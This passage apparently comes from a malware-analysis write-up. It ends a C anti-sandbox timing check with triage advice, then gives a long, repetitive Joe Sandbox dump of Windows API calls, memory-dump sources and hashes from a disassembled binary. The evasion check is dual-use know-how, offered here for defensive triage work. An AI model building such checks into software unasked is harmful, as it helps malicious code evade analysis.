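
int main(void)
{
    int tampered = timing_check(50);
    printf("Sleep(50) %s\n",
           tampered ? "returned early: sleep patching or clock acceleration suspected"
                    : "ran in full");
    return 0;
}
```

When triaging a sample that carries this pattern, note that defeating it by patching Sleep alone is what the check is designed to catch; a sandbox that wants to skip the delay has to advance the performance counter consistently as well.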
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                              • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                              • DestroyIcon.USER32(?), ref: 0046FD58
                                                                              • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyIcon
                                                                              • String ID:
                                                                              • API String ID: 3419509030-0
                                                                              • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                              • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 004175AE
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __amsg_exit.LIBCMT ref: 004175CE
                                                                              • __lock.LIBCMT ref: 004175DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                              • InterlockedIncrement.KERNEL32(02FF2CE0), ref: 00417626
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                              • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                              • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                              • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 4023252218-0
                                                                              • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                              • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460342
• GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
• MessageBeep.USER32(00000000), ref: 0046036D
• KillTimer.USER32(?,0000040A), ref: 00460392
• EndDialog.USER32(?,00000001), ref: 004603AB
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
APIs
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 132634196-0
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00415620
• CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
• __freeptd.LIBCMT ref: 0041563B
• ExitThread.KERNEL32 ref: 00415643
Similarity
• API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3798957060-0
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1537469427-0
Strings
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
APIs
Strings
Similarity
• API ID: _memcmp
• String ID: '$[$h
• API String ID: 2931989736-1224472061
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: >$R$U
• API String ID: 909875538-1924298640
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                              • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 176396367-557222456
                                                                              • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                              • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopyInit_malloc
                                                                              • String ID: 4RH
                                                                              • API String ID: 2981388473-749298218
                                                                              • Opcode ID: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                              • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                              • Opcode Fuzzy Hash: 4f5dbf7d09d6609eea61bad343ccdb5a393d5a012301d28101c94dc94e671a2c
                                                                              • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • __wcsnicmp.LIBCMT ref: 0046681A
                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                              • String ID: LPT$HH
                                                                              • API String ID: 3035604524-2728063697
                                                                              • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                              • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                              APIs
                                                                                • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                              • String ID: @
                                                                              • API String ID: 4055202900-2766056989
                                                                              • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                              • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset_wcslen
                                                                              • String ID: |
                                                                              • API String ID: 915713708-2343686810
                                                                              • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                              • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                              • HttpQueryInfoW.WININET ref: 0044A892
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3705125965-3916222277
                                                                              • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                              • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                              • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                              • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: AU3_GetPluginDetails
                                                                              • API String ID: 145871493-4132174516
                                                                              • Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                              • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                              • Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                              • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 3375834691-2298589950
                                                                              • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                              • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                              • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                              • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
